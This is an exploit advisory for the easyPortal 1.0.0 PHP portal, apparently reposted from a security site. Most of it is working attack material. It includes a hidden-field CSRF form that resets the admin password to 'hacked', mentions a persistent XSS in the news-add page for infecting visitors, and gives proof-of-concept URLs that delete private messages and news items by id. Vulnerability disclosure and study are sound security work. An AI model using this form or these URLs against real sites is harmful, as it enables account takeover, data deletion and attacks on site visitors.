easyPortal v1.0.0 Multiple Vulnerabilities

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

easyPortal v1.0.0 Multiple Vulnerabilities

来源：vfocus.net 作者： Milos Zivanovic 发布时间：2010-01-04

[#-----------------------------------------------------------------------------------------------#]
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 02. January 2010.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: easyPortal
[#] Version: 1.0.0
[#] Platform: PHP
[#] Homepage: http://www.eazyportal.com/
[#] Vulnerability: Multiple XSRF Vulnerabilities And Persistent XSS
[#-----------------------------------------------------------------------------------------------#]

[#]Content
 |--Change admin password
 |--Add news - Persistent XSS
 |--Remove private message by id
 |--Remove news by id

[*]Change admin password

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://host/" enctype="multipart/form-data" method="post">
  <input type="hidden" name="a" value="profile"/>
  <input type="hidden" name="uname" value="admin"/>
  <input type="hidden" name="uavatar" value=""/>
  <input type="hidden" name="uemail"  value="e@mail.com"/>
  <input type="hidden" name="upwd" value="hacked"/>
  <input type="hidden" name="ucpwd" value="hacked"/>
  <input type="hidden" name="ulocation" value="moon"/>
  <input type="hidden" name="usignature" value="free your mind and the
ass will follow"/>
  <input type="hidden" name="ushowemail" value="0"/>
  <input type="hidden" name="ugmt" value="0"/>
  <input type="hidden" name="ufile"/>
  <input type="image"
src="http://host/tpl/DefaultGreen/img/button_submit.gif"
name="submit"/>
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[+]Add news - Persistent XSS

http://host/index.php?a=administrator&p=news&s=add

There we can add new news that can be seen on main page. It is
vulnerable to persistent xss and
attacker can use this to infect website visitors.

[-]Remove private message by id

[POC----------------------------------------------------------------------------------------------]
http://host/index.php?a=private&inbox=&d=[ID]
[POC----------------------------------------------------------------------------------------------]

[-]Remove news by id

[POC----------------------------------------------------------------------------------------------]
http://host/index.php?a=administrator&p=news&del=[ID]
[POC----------------------------------------------------------------------------------------------]

[#] EOF

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告